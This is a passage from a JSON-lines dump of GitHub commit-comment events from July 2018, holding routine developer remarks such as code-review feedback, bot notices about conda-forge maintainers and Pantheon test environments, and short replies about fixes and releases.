[here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T19:10:32Z"}
{"id":"8032764886","type":"CommitCommentEvent","actor":{"login":"herohamp"},"repo":{"name":"herohamp/Purpura"},"payload":{"comment":{"id":29870219,"position":null,"line":null,"path":null,"commit_id":"6eb4d44b016e2b7b62b4fdec58e369729a0089af","created_at":"2018-07-28T19:10:34Z","updated_at":"2018-07-28T19:10:34Z","author_association":"OWNER","body":"Yeah, that is what I meant. Sorry I'm tired"}},"created_at":"2018-07-28T19:10:34Z"}
{"id":"8032768434","type":"CommitCommentEvent","actor":{"login":"mlebkowski"},"repo":{"name":"syzygypl/kunstmaan-feed-bundle"},"payload":{"comment":{"id":29870234,"position":5,"line":4,"path":"composer.json","commit_id":"f7b4d732a2b3c5af8dc3bd8f8687038105277908","created_at":"2018-07-28T19:12:55Z","updated_at":"2018-07-28T19:12:55Z","author_association":"MEMBER","body":"jak bumpniesz kolejną, to znów będzie niezgodny. `>=1.0-RC.1` powinno zadziałać."}},"created_at":"2018-07-28T19:12:55Z"}
{"id":"8032769650","type":"CommitCommentEvent","actor":{"login":"cuttlefishh"},"repo":{"name":"cuttlefishh/tourmaline"},"payload":{"comment":{"id":29870239,"position":null,"line":null,"path":null,"commit_id":"50e45ee3c188843dd1452f1799bbe6e1277615b0","created_at":"2018-07-28T19:13:33Z","updated_at":"2018-07-28T19:13:33Z","author_association":"OWNER","body":"Mis-typed commit message. It was just edits of README."}},"created_at":"2018-07-28T19:13:33Z"}
{"id":"8032769908","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29870241,"position":null,"line":null,"path":null,"commit_id":"0c9c1208cc23bab862638ac36af4eec8a9c3b27e","created_at":"2018-07-28T19:13:42Z","updated_at":"2018-07-28T19:13:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-562](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-562).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-562-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-28T19:13:42Z"}
{"id":"8032770044","type":"CommitCommentEvent","actor":{"login":"GillesHaverbeke"},"repo":{"name":"HackYourFutureBelgium/github-explorer-abdous"},"payload":{"comment":{"id":29870243,"position":null,"line":null,"path":null,"commit_id":"23eacc8f5c51eb436ccdbe3941ce70f6ecdb0940","created_at":"2018-07-28T19:13:47Z","updated_at":"2018-07-28T19:13:47Z","author_association":"NONE","body":"Feedback:\r\nGreat that you got a functional working page! Good job!\r\n\r\nA couple of things:\r\n- Minor thing: Make sure to not leave console.log debug statements in \"released\" code. It's very usefull for debugging during development but clean it up after you fix the part you used it for.\r\n- You are showing VERY limited information about the repo. It would be a lot more useful if you also show the description of the repo, maybe a nice picture of the contributors. Also you didn't implement that you can click on the contributor to open contributor details. Technically not very challenging maybe, but those simple details can make or break your solution for the end user.\r\n- The select input behavior is a bit buggy. Every time that update() is called you are recreating the selectbox. This is fine, you should just make sure that you keep the selected element that the user just switched to. You could fix this for example by adding $select.selectedIndex = SELECTED_REPO_INDEX; on line 51. \r\n- You are automatically selecting a repository on line 90 by hardcoding it to SELECTED_REPO_INDEX=3. This is quite dangerous, because what would happen when less then 4 repo's would be left on github? Your application would crash. Also, why 3? :)\r\n- Also, it is of course perfectly fine to auto-select a repo so something usefull is immediately shown on load. The problem right now is that you are showing the repo name of the auto-selected repo, but the contributors are not being loaded. You could fixed by somehow making sure that the logic in the onSelectRepo is executed on intial load (this function currently contains some logic that it can only be called by an event, so that might need some attention)\r\n- You are doing some magic in the onSelectRepo function to find the item in REPOS that is actually selected based on the value of the select. You can make this a lot easier by replacing the first 4 lines with const repo = REPOS[e.target.selectedIndex]; (You used the \"value\" property of the select, but a select also has a \"selectedIndex\" property that returns the actually selected item)\r\n"}},"created_at":"2018-07-28T19:13:47Z"}
{"id":"8032772389","type":"CommitCommentEvent","actor":{"login":"gwolf2u"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29870253,"position":8,"line":130,"path":"update.xml","commit_id":"ee9f69fb06577e6f963218324df863ed1399330d","created_at":"2018-07-28T19:15:10Z","updated_at":"2018-07-28T19:15:10Z","author_association":"MEMBER","body":"deleted changelog_shamu.txt \r\nyou might want to consider making changelog tag empty then"}},"created_at":"2018-07-28T19:15:10Z"}
{"id":"8032775965","type":"CommitCommentEvent","actor":{"login":"trexbatman"},"repo":{"name":"giselyalves13/angelHack2018"},"payload":{"comment":{"id":29870266,"position":null,"line":null,"path":null,"commit_id":"8b11de954a8a5ce543d1b14e21b20759d1a8b61c","created_at":"2018-07-28T19:18:00Z","updated_at":"2018-07-28T19:18:00Z","author_association":"COLLABORATOR","body":"Aglomerados Subnormais [ftp://ftp.ibge.gov.br/Censos/Censo_Demografico_2010/Aglomerados_subnormais/](url)"}},"created_at":"2018-07-28T19:18:00Z"}
{"id":"8032779352","type":"CommitCommentEvent","actor":{"login":"Deviner75"},"repo":{"name":"Deviner75/lafore_ex"},"payload":{"comment":{"id":29870282,"position":null,"line":null,"path":null,"commit_id":"5cd93982a317141d7a059c7813ee543a6d047d45","created_at":"2018-07-28T19:20:30Z","updated_at":"2018-07-28T19:20:30Z","author_association":"OWNER","body":"tetet"}},"created_at":"2018-07-28T19:20:30Z"}
{"id":"8032779484","type":"CommitCommentEvent","actor":{"login":"tyt3"},"repo":{"name":"tyt3/LIS_2407"},"payload":{"comment":{"id":29870285,"position":null,"line":null,"path":null,"commit_id":"1061836c4e3e69febdabc5408215a994b4f1c935","created_at":"2018-07-28T19:20:36Z","updated_at":"2018-07-28T19:20:36Z","author_association":"OWNER","body":"Corrected stolen date entries"}},"created_at":"2018-07-28T19:20:36Z"}
{"id":"8032779919","type":"CommitCommentEvent","actor":{"login":"Deviner75"},"repo":{"name":"Deviner75/lafore_ex"},"payload":{"comment":{"id":29870289,"position":null,"line":null,"path":null,"commit_id":"5cd93982a317141d7a059c7813ee543a6d047d45","created_at":"2018-07-28T19:20:55Z","updated_at":"2018-07-28T19:20:55Z","author_association":"OWNER","body":"wightw is wrong\r\n"}},"created_at":"2018-07-28T19:20:55Z"}
{"id":"8032790849","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-ade4-feedstock"},"payload":{"comment":{"id":29870328,"position":null,"line":null,"path":null,"commit_id":"07942e9ad563da310b1a1f57e30bdf832ca07492","created_at":"2018-07-28T19:29:51Z","updated_at":"2018-07-28T19:29:51Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T19:29:51Z"}
{"id":"8032792859","type":"CommitCommentEvent","actor":{"login":"mishuvs"},"repo":{"name":"mishuvs/open-event-server"},"payload":{"comment":{"id":29870338,"position":9,"line":250,"path":"app/api/schema/events.py","commit_id":"7522ba4fddb96fb459ceb25c2e58709ea8823e71","created_at":"2018-07-28T19:31:21Z","updated_at":"2018-07-28T19:31:21Z","author_association":"OWNER","body":"But every relationship has schema in single Quotes."}},"created_at":"2018-07-28T19:31:21Z"}
{"id":"8032794536","type":"CommitCommentEvent","actor":{"login":"D3AH"},"repo":{"name":"RedCiudadana/ConoceTuEscuela"},"payload":{"comment":{"id":29870343,"position":null,"line":null,"path":null,"commit_id":"07470199de5d1dc156474aab8989f940997f63e2","created_at":"2018-07-28T19:32:41Z","updated_at":"2018-07-28T19:32:41Z","author_association":"CONTRIBUTOR","body":"close #4 "}},"created_at":"2018-07-28T19:32:41Z"}
{"id":"8032796786","type":"CommitCommentEvent","actor":{"login":"ray-rogers"},"repo":{"name":"ray-rogers/tutorial"},"payload":{"comment":{"id":29870347,"position":null,"line":null,"path":null,"commit_id":"21414928945eb41632e56bf75bba5f98ad64413b","created_at":"2018-07-28T19:34:28Z","updated_at":"2018-07-28T19:34:28Z","author_association":"OWNER","body":"Where is this going\r\n"}},"created_at":"2018-07-28T19:34:28Z"}
{"id":"8032798238","type":"CommitCommentEvent","actor":{"login":"jonathadv"},"repo":{"name":"lucasmello/Driloader"},"payload":{"comment":{"id":29870351,"position":null,"line":null,"path":null,"commit_id":"38e582de4a89ffcb3ca4ccd39a3f5c9eaa20fe3d","created_at":"2018-07-28T19:35:41Z","updated_at":"2018-07-28T19:35:41Z","author_association":"COLLABORATOR","body":"Good catch @lucasmello!\r\n"}},"created_at":"2018-07-28T19:35:41Z"}
{"id":"8032798572","type":"CommitCommentEvent","actor":{"login":"jeffrom"},"repo":{"name":"evmar/j8t"},"payload":{"comment":{"id":29870356,"position":10,"line":105,"path":"src/bind.rs","commit_id":"2744cd8f00506e5ed7668a2564c3c1ec20051e7d","created_at":"2018-07-28T19:35:58Z","updated_at":"2018-07-28T19:35:58Z","author_association":"NONE","body":"hehe, this project looks really cool!"}},"created_at":"2018-07-28T19:35:58Z"}
{"id":"8032798634","type":"CommitCommentEvent","actor":{"login":"luizirber"},"repo":{"name":"luizirber/wort-dnd"},"payload":{"comment":{"id":29870357,"position":null,"line":null,"path":null,"commit_id":"fe840e1bc37abd46a63b71d9a5e1de627be3d912","created_at":"2018-07-28T19:36:02Z","updated_at":"2018-07-28T19:36:02Z","author_association":"OWNER","body":"glad it was helpful =]\r\n\r\n(I'm subscribed to the webpack PR and when it is merged and released I will go back to a proper version, but it is very useful to, you know, have it working now :stuck_out_tongue:)"}},"created_at":"2018-07-28T19:36:02Z"}
{"id":"8032798917","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29870358,"position":null,"line":null,"path":null,"commit_id":"8a9889fd76bc485796a70c5423ed1481dc1aa176","created_at":"2018-07-28T19:36:15Z","updated_at":"2018-07-28T19:36:15Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-563](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-563).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-563-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-28T19:36:15Z"}
{"id":"8032802200","type":"CommitCommentEvent","actor":{"login":"JJMC89"},"repo":{"name":"JJMC89/bsiconsbot"},"payload":{"comment":{"id":29870365,"position":null,"line":null,"path":null,"commit_id":"e60366374f25d7a0e624d973bfacc68c95e84bc3","created_at":"2018-07-28T19:38:59Z","updated_at":"2018-07-28T19:38:59Z","author_association":"OWNER","body":"#4"}},"created_at":"2018-07-28T19:38:59Z"}
{"id":"8032803369","type":"CommitCommentEvent","actor":{"login":"JJMC89"},"repo":{"name":"JJMC89/bsiconsbot"},"payload":{"comment":{"id":29870370,"position":null,"line":null,"path":null,"commit_id":"ae4a7f3f95557b0b823161a9f17f66d72773d200","created_at":"2018-07-28T19:39:56Z","updated_at":"2018-07-28T19:39:56Z","author_association":"OWNER","body":"Workaround for #6"}},"created_at":"2018-07-28T19:39:56Z"}
{"id":"8032803572","type":"CommitCommentEvent","actor":{"login":"allves90"},"repo":{"name":"Microsoft/uf2"},"payload":{"comment":{"id":29870373,"position":3,"line":1,"path":"utils/uf2conv.py","commit_id":"68090735cd5057dea2677dc12deca0e51711a2e1","created_at":"2018-07-28T19:40:07Z","updated_at":"2018-07-28T19:40:07Z","author_association":"NONE","body":"#! / allves27 / Caca1979 / activada\r\n"}},"created_at":"2018-07-28T19:40:07Z"}
{"id":"8032803727","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"mrocklin/blog"},"payload":{"comment":{"id":29870374,"position":65,"line":161,"path":"_posts/work/2018-07-23-protocols-pickle.md","commit_id":"e7bbf801ce90f031e02d60cff27247a2948a6e15","created_at":"2018-07-28T19:40:13Z","updated_at":"2018-07-28T19:40:13Z","author_association":"NONE","body":"Though admittedly Queue uses Pickle as well. So wouldn't be surprised if it is the pickling strategy that is expensive and not the copy."}},"created_at":"2018-07-28T19:40:13Z"}
{"id":"8032804766","type":"CommitCommentEvent","actor":{"login":"allves90"},"repo":{"name":"Microsoft/uf2"},"payload":{"comment":{"id":29870379,"position":23,"line":32,"path":"utils/uf2conv.py","commit_id":"68090735cd5057dea2677dc12deca0e51711a2e1","created_at":"2018-07-28T19:41:05Z","updated_at":"2018-07-28T19:41:05Z","author_association":"NONE","body":"0"}},"created_at":"2018-07-28T19:41:05Z"}
{"id":"8032806912","type":"CommitCommentEvent","actor":{"login":"Silex"},"repo":{"name":"Silex/docker.el"},"payload":{"comment":{"id":29870382,"position":8,"line":38,"path":"docker.el","commit_id":"96404e896627f737a219f096aa080aa4d8538639","created_at":"2018-07-28T19:42:58Z","updated_at":"2018-07-28T19:42:58Z","author_association":"OWNER","body":"Well I based on magit:\r\n\r\nhttps://github.com/magit/magit/blob/master/lisp/magit.el#L586\r\nhttps://github.com/magit/magit/blob/master/lisp/magit-branch.el#L34\r\n\r\nSo you're saying magit does it weirdly too?"}},"created_at":"2018-07-28T19:42:58Z"}
{"id":"8032807585","type":"CommitCommentEvent","actor":{"login":"jacargentina"},"repo":{"name":"dancormier/react-native-swipeout"},"payload":{"comment":{"id":29870386,"position":null,"line":null,"path":null,"commit_id":"6bff217b7df9527a80d4e2f52c24838b88ff52f6","created_at":"2018-07-28T19:43:32Z","updated_at":"2018-07-28T19:43:32Z","author_association":"NONE","body":"Please bump version and publish a new release with this"}},"created_at":"2018-07-28T19:43:32Z"}
{"id":"8032808276","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29870387,"position":null,"line":null,"path":null,"commit_id":"0bb3e90ee85c976a9f8cf31f3bace04cf3b0a003","created_at":"2018-07-28T19:44:08Z","updated_at":"2018-07-28T19:44:08Z","author_association":"MEMBER","body":"> If you have a habbit to append every single commit on your personal repo to official repo\r\n\r\nNo, I don't."}},"created_at":"2018-07-28T19:44:08Z"}
{"id":"8032808610","type":"CommitCommentEvent","actor":{"login":"fincs"},"repo":{"name":"Atmosphere-NX/Atmosphere"},"payload":{"comment":{"id":29870388,"position":68,"line":54,"path":"stratosphere/fs_mitm/source/fsmitm_utils.cpp","commit_id":"cd42f6dc18347e5e5a967c298c6caf4efd1e440c","created_at":"2018-07-28T19:44:23Z","updated_at":"2018-07-28T19:44:23Z","author_association":"NONE","body":"Since this is directly using FS service commands (why btw?), it shouldn't have the devoptab `sdmc:/` device specifier."}},"created_at":"2018-07-28T19:44:23Z"}
{"id":"8032810510","type":"CommitCommentEvent","actor":{"login":"inukshuk"},"repo":{"name":"zotero/zotero"},"payload":{"comment":{"id":29870397,"position":28,"line":28,"path":"chrome/content/zotero/xpcom/intl.js","commit_id":"38166d4e05d5539df6ef3a0f30f04fd5dad3a60c","created_at":"2018-07-28T19:45:34Z","updated_at":"2018-07-28T19:45:34Z","author_association":"MEMBER","body":"@dstillman `pluralFormGet` and `pluralFormNumForms` was exposed by `Zotero`. I'm pretty sure that they are not used outside of `getString()` so I did not expose them. Is that OK?"}},"created_at":"2018-07-28T19:45:34Z"}
{"id":"8032811331","type":"CommitCommentEvent","actor":{"login":"inukshuk"},"repo":{"name":"zotero/zotero"},"payload":{"comment":{"id":29870402,"position":51,"line":51,"path":"chrome/content/zotero/xpcom/intl.js","commit_id":"38166d4e05d5539df6ef3a0f30f04fd5dad3a60c","created_at":"2018-07-28T19:46:11Z","updated_at":"2018-07-28T19:46:11Z","author_association":"MEMBER","body":"This will be in conflict with the `fx60` branch, but an easy change."}},"created_at":"2018-07-28T19:46:11Z"}
{"id":"8032813591","type":"CommitCommentEvent","actor":{"login":"allves90"},"repo":{"name":"allves90/ivan-gonzalez-martinez"},"payload":{"comment":{"id":29870403,"position":1,"line":1,"path":"_config.yml","commit_id":"8f87004bd57020d00816def40fc0582b749c989f","created_at":"2018-07-28T19:47:55Z","updated_at":"2018-07-28T19:47:55Z","author_association":"OWNER","body":"Activado"}},"created_at":"2018-07-28T19:47:55Z"}
{"id":"8032813721","type":"CommitCommentEvent","actor":{"login":"Silex"},"repo":{"name":"Silex/docker.el"},"payload":{"comment":{"id":29870404,"position":8,"line":38,"path":"docker.el","commit_id":"96404e896627f737a219f096aa080aa4d8538639","created_at":"2018-07-28T19:48:03Z","updated_at":"2018-07-28T19:48:03Z","author_association":"OWNER","body":"Ah, I just realised the `require`s are after the `provide`. I'm fixing it now."}},"created_at":"2018-07-28T19:48:03Z"}
{"id":"8032813993","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29870408,"position":null,"line":null,"path":null,"commit_id":"07b3b10b1f9dd77ea50e087e874022ac81aa3cfd","created_at":"2018-07-28T19:48:15Z","updated_at":"2018-07-28T19:48:15Z","author_association":"OWNER","body":"Also, the name for the Atlas ICBM heritage rockets changed to Bossart. Are we not doing that anymore? If so it needs to be changed back."}},"created_at":"2018-07-28T19:48:15Z"}
{"id":"8032814247","type":"CommitCommentEvent","actor":{"login":"dovchinnikov"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":29870409,"position":25,"line":19,"path":"platform/core-api/src/com/intellij/util/QueryExecutor.java","commit_id":"aaed1ccb910f6f4a9ea2f96894d99b6e35a59ef9","created_at":"2018-07-28T19:48:28Z","updated_at":"2018-07-28T19:48:28Z","author_association":"MEMBER","body":"@KronicDeth please see https://youtrack.jetbrains.com/issue/IDEA-193208#focus=streamItem-27-2901181-0-0 "}},"created_at":"2018-07-28T19:48:28Z"}
{"id":"8032815347","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"BKPepe/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29870411,"position":null,"line":null,"path":null,"commit_id":"8b7feb3aaa58a682a2e9c6e94bc71c196067d15f","created_at":"2018-07-28T19:49:22Z","updated_at":"2018-07-28T19:49:22Z","author_association":"OWNER","body":"Je nutné ještě přeložit: https://github.com/mybb/mybb/commit/7741b4df55461f7708bba6f0cc9d7430021fdcc7"}},"created_at":"2018-07-28T19:49:22Z"}
{"id":"8032815656","type":"CommitCommentEvent","actor":{"login":"GillesHaverbeke"},"repo":{"name":"HackYourFutureBelgium/github-explorer-Luay85"},"payload":{"comment":{"id":29870412,"position":null,"line":null,"path":null,"commit_id":"be4f10a3285e8bc0802cf5f241f29a562bd3960b","created_at":"2018-07-28T19:49:39Z","updated_at":"2018-07-28T19:49:39Z","author_association":"NONE","body":"Feedback:\r\nGood job!\r\n\r\nA couple of things:\r\n- You are doing some magic in the onSelectRepo function to find the item in REPOS that is actually selected based on the value of the select. You can make this a lot easier by replacing the first 4 lines with const repo = REPOS[e.target.selectedIndex]; (You used the \"value\" property of the select, but a select also has a \"selectedIndex\" property that returns the actually selected item)\r\n- The select input behavior is a bit buggy. Every time that update() is called you are recreating the selectbox. This is fine, you should just make sure that you keep the selected element that the user just switched to. You could fix this for example by adding something like   $select.selectedIndex = SELECTED_REPO_INDEX + 1; on line 55."}},"created_at":"2018-07-28T19:49:39Z"}
{"id":"8032815722","type":"CommitCommentEvent","actor":{"login":"Silex"},"repo":{"name":"Silex/docker.el"},"payload":{"comment":{"id":29870413,"position":8,"line":38,"path":"docker.el","commit_id":"96404e896627f737a219f096aa080aa4d8538639","created_at":"2018-07-28T19:49:43Z","updated_at":"2018-07-28T19:49:43Z","author_association":"OWNER","body":"Fixed in https://github.com/Silex/docker.el/commit/1fa68a9eca5d5a1541b06a82e348c0fcdff7b621"}},"created_at":"2018-07-28T19:49:43Z"}
{"id":"8032815882","type":"CommitCommentEvent","actor":{"login":"inukshuk"},"repo":{"name":"zotero/zotero"},"payload":{"comment":{"id":29870414,"position":70,"line":1419,"path":"chrome/content/zotero/xpcom/zotero.js","commit_id":"38166d4e05d5539df6ef3a0f30f04fd5dad3a60c","created_at":"2018-07-28T19:49:51Z","updated_at":"2018-07-28T19:49:51Z","author_association":"MEMBER","body":"`getStringFromBundle` was not used anywhere that so I removed it, too. Let me know if you'd rather keep it exposed on `Zotero` (pushing it a little here!)."}},"created_at":"2018-07-28T19:49:51Z"}
{"id":"8032816296","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29870418,"position":null,"line":null,"path":null,"commit_id":"cca43037849c211697c402a5cf468813c4700e18","created_at":"2018-07-28T19:50:10Z","updated_at":"2018-07-28T19:50:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-564](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-564).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-564-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-28T19:50:10Z"}
{"id":"8032816908","type":"CommitCommentEvent","actor":{"login":"estefan3112"},"repo":{"name":"libretro/mame"},"payload":{"comment":{"id":29870421,"position":null,"line":null,"path":null,"commit_id":"6bc57063e7bd5c122c191ee4c3029755eba76de0","created_at":"2018-07-28T19:50:36Z","updated_at":"2018-07-28T19:50:36Z","author_association":"NONE","body":"This is big news. Would mame now compile under osx for Retroarch? The nighty is still from way back...\r\n"}},"created_at":"2018-07-28T19:50:36Z"}
{"id":"8032818029","type":"CommitCommentEvent","actor":{"login":"jimmyff"},"repo":{"name":"jimmyff/dart-gif-encoder"},"payload":{"comment":{"id":29870426,"position":173,"line":135,"path":"test/gif_test.dart","commit_id":"b0c14cc43a5a96c5939f6b0f0bf2c571c327de9b","created_at":"2018-07-28T19:51:32Z","updated_at":"2018-07-28T19:51:32Z","author_association":"OWNER","body":"Yep I did think this wasn't very readable. I'll look in to a fix"}},"created_at":"2018-07-28T19:51:32Z"}
{"id":"8032819786","type":"CommitCommentEvent","actor":{"login":"ohne80"},"repo":{"name":"0sander/stratux_air_nav_pro"},"payload":{"comment":{"id":29870428,"position":null,"line":null,"path":null,"commit_id":"f6d94e06da489a3e6a444d3ecc49e637e775bc0b","created_at":"2018-07-28T19:52:59Z","updated_at":"2018-07-28T19:52:59Z","author_association":"NONE","body":"I know. But the config file didn’t exists\n\nWhen I open the file it shows that it is an new file without any content\n\nWhat have to be in the config file?\n\n\nGesendet mit der GMX iPad App\n\nAm 28.07.18 um 20:38 schrieb 0sander\n\n> The stratux.conf is not a logfile but a config file. It can be found in /etc/stratux.conf as stated in the README...\n> \n> -- \n> You are receiving this because you commented.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/0sander/stratux_air_nav_pro/commit/f6d94e06da489a3e6a444d3ecc49e637e775bc0b#commitcomment-29870044\n"}},"created_at":"2018-07-28T19:52:59Z"}
{"id":"8032821805","type":"CommitCommentEvent","actor":{"login":"neerav1997"},"repo":{"name":"amitkayal/mnist_digits_classification"},"payload":{"comment":{"id":29870444,"position":null,"line":null,"path":null,"commit_id":"1af51d775ea7ac78cced8fecc27a2b333c48d5d9","created_at":"2018-07-28T19:54:43Z","updated_at":"2018-07-28T19:54:43Z","author_association":"NONE","body":"I am getting LR prediction as 0 every time I try on frame. CNN prediction is working fine. \r\nI am getting this warning - Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA.....which is I thing nothing to do with LR's working. I did not do any modifications to the files. Can you help out?"}},"created_at":"2018-07-28T19:54:43Z"}
{"id":"8032821874","type":"CommitCommentEvent","actor":{"login":"greg-king5"},"repo":{"name":"cc65/cc65"},"payload":{"comment":{"id":29870445,"position":null,"line":null,"path":null,"commit_id":"eeb1b927cee5fefe6910201447a23781ef4ea720","created_at":"2018-07-28T19:54:47Z","updated_at":"2018-07-28T19:54:47Z","author_association":"CONTRIBUTOR","body":"I plan to make a second commit that handles both memory bank expressions and far-address expressions.\r\nThen, I will close #669."}},"created_at":"2018-07-28T19:54:47Z"}
{"id":"8032822525","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29870448,"position":null,"line":null,"path":null,"commit_id":"991dfdbae67dc54568c6d1c7dce219eb18170198","created_at":"2018-07-28T19:55:19Z","updated_at":"2018-07-28T19:55:19Z","author_association":"MEMBER","body":"AutoBouquetsMaker is patched too. Thanks.\r\n\r\nhttps://github.com/oe-alliance/AutoBouquetsMaker/commit/b0d064606c0d38f879ab9aeed5cd0747421969a4"}},"created_at":"2018-07-28T19:55:19Z"}
{"id":"8032822638","type":"CommitCommentEvent","actor":{"login":"lognaturel"},"repo":{"name":"opendatakit/collect"},"payload":{"comment":{"id":29870450,"position":34,"line":160,"path":"collect_app/src/main/java/org/odk/collect/android/preferences/ServerPreferencesFragment.java","commit_id":"1c578a475378e1422389d3515ee2e1b2ed77e192","created_at":"2018-07-28T19:55:24Z","updated_at":"2018-07-28T19:55:24Z","author_association":"MEMBER","body":"You could even add a `toString` to the enum to centralize all related behavior there."}},"created_at":"2018-07-28T19:55:24Z"}
{"id":"8032823379","type":"CommitCommentEvent","actor":{"login":"1amjd1"},"repo":{"name":"useignition/ShieldXI"},"payload":{"comment":{"id":29870451,"position":11,"line":730,"path":"Tweak.xm","commit_id":"d5ba981f1bc612be55a1a5374a2607ae618779eb","created_at":"2018-07-28T19:56:03Z","updated_at":"2018-07-28T19:56:03Z","author_association":"NONE","body":"Yes "}},"created_at":"2018-07-28T19:56:03Z"}
{"id":"8032824307","type":"CommitCommentEvent","actor":{"login":"1amjd1"},"repo":{"name":"useignition/ShieldXI"},"payload":{"comment":{"id":29870457,"position":4,"line":365,"path":"Tweak.xm","commit_id":"d5ba981f1bc612be55a1a5374a2607ae618779eb","created_at":"2018-07-28T19:56:52Z","updated_at":"2018-07-28T19:56:52Z","author_association":"NONE","body":"A1533"}},"created_at":"2018-07-28T19:56:52Z"}
{"id":"8032826650","type":"CommitCommentEvent","actor":{"login":"lassoan"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29870469,"position":25,"line":52,"path":"Modules/Loadable/Markups/MRML/vtkMRMLMarkupsFiducialStorageNode.cxx","commit_id":"7df26d7925faea88fc1b302082d6c186ffdbe458","created_at":"2018-07-28T19:58:45Z","updated_at":"2018-07-28T19:58:45Z","author_association":"CONTRIBUTOR","body":"Thanks for letting me know. I hope this fix will work:\r\n\r\nhttps://github.com/Slicer/Slicer/commit/d3cdbf13a8ec34f680b71a4cd7f074b550ed5483"}},"created_at":"2018-07-28T19:58:45Z"}
{"id":"8032826670","type":"CommitCommentEvent","actor":{"login":"mtedone"},"repo":{"name":"wardviaene/docker-demo"},"payload":{"comment":{"id":29870470,"position":null,"line":null,"path":null,"commit_id":"3ec042c47c93ddea245d3e7c3ae11d4e6d63e853","created_at":"2018-07-28T19:58:46Z","updated_at":"2018-07-28T19:58:46Z","author_association":"NONE","body":"This is a .gitignore file for node js applications"}},"created_at":"2018-07-28T19:58:46Z"}
{"id":"8032827180","type":"CommitCommentEvent","actor":{"login":"developershubh13"},"repo":{"name":"developershubh13/Hello-World"},"payload":{"comment":{"id":29870471,"position":null,"line":null,"path":null,"commit_id":"e8de0bc557647a541180e0e9c8a30a0a878443cb","created_at":"2018-07-28T19:59:11Z","updated_at":"2018-07-28T19:59:11Z","author_association":"OWNER","body":"LocalBranch"}},"created_at":"2018-07-28T19:59:11Z"}
{"id":"8031471932","type":"CommitCommentEvent","actor":{"login":"gai1999"},"repo":{"name":"gai1999/my"},"payload":{"comment":{"id":29865838,"position":3,"line":3,"path":"README.md","commit_id":"7a022996dcaee2cafc83963b4fc96204b2782902","created_at":"2018-07-28T02:00:33Z","updated_at":"2018-07-28T02:00:33Z","author_association":"OWNER","body":"自己给自己评价一下\r\n"}},"created_at":"2018-07-28T02:00:33Z"}
{"id":"8031474356","type":"CommitCommentEvent","actor":{"login":"J5lx"},"repo":{"name":"J5lx/pencil"},"payload":{"comment":{"id":29865846,"position":null,"line":null,"path":null,"commit_id":"d2b40b9cb6941964d435a8349e25bb8c52de1359","created_at":"2018-07-28T02:01:56Z","updated_at":"2018-07-28T02:01:56Z","author_association":"OWNER","body":"Yes, I will. I didn't know GitHub sent out notifications for commits; actually I think the last time I tried mentioning someone there it wasn't even being linked. I'm very sorry for the noise!"}},"created_at":"2018-07-28T02:01:56Z"}
